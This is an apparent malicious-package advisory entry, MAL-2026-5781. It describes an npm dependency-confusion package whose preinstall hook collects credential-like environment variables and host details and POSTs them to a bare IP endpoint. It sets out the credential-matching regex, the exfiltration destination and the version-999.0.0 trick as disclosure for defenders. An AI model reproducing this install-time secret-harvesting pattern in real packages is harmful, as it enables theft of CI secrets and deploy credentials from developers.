MAL-2026-5781

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c5aca21d0e952f5ba313432cf5d47e41f185d19e65d894a005cce20be90d4985) On `npm install`, the package's `preinstall` hook executes `postinstall.js`, which enumerates `process.env` and filters keys matching a broad credential-shaped regex (key|secret|token|pass|private|ssh|deploy|auth|api|rpc|wallet|sentry|docker|graph|slack|host), then bundles those values together with `os.hostname()`, `os.userInfo().username`, `process.cwd()`, and npm registry config into a JSON payload and POSTs it via `https.request` to `185.130.46.35:8443/collect` — a bare IP with no relation to any publisher domain. The source even self-identifies the behavior in a comment ("Exfil CI environment variables on install"). The package itself is hollow: `index.js` is `module.exports = {}`, the description is the generic "Internal package," and the version is `999.0.0` — the canonical dependency-confusion shape designed to outrank a private registry's `portal-backend` and have misconfigured installers fetch this public copy instead. Installing this package on any developer or CI machine immediately ships that machine's CI secrets, deploy tokens, SSH/registry credentials, and host identity to the attacker.